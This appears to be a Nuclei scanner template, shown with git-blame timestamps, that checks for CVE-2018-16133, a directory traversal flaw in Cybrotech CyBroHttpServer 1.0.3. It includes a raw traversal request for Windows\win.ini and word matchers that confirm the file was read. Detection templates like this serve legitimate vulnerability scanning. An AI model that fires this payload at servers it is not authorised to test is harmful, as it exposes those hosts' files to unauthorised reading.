2021-12-01 02:26:56 +00:00
|
|
|
id: CVE-2018-16133
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-12-01 02:26:56 +00:00
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
|
2021-12-01 02:26:56 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: medium
|
2022-07-26 13:45:11 +00:00
|
|
|
description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
|
2021-12-01 02:26:56 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
|
2021-12-01 13:45:56 +00:00
|
|
|
- http://www.cybrotech.com/
|
2021-12-01 02:26:56 +00:00
|
|
|
- https://www.cvedetails.com/cve/CVE-2018-16133
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16133
|
2021-12-01 02:26:56 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
|
|
|
cve-id: CVE-2018-16133
|
|
|
|
cwe-id: CWE-22
|
2021-12-01 13:45:56 +00:00
|
|
|
tags: cve,cve2018,cybrotech,lfi
|
2021-12-01 02:26:56 +00:00
|
|
|
|
|
|
|
requests:
|
2021-12-01 13:45:56 +00:00
|
|
|
- raw:
|
2021-12-03 05:22:45 +00:00
|
|
|
- |+
|
2021-12-01 13:45:56 +00:00
|
|
|
GET \..\..\..\..\Windows\win.ini HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2021-12-01 02:26:56 +00:00
|
|
|
|
2021-12-01 13:45:56 +00:00
|
|
|
unsafe: true
|
2021-12-01 02:26:56 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "bit app support"
|
|
|
|
- "fonts"
|
|
|
|
- "extensions"
|
|
|
|
condition: and
|
2022-07-26 13:45:11 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/22
|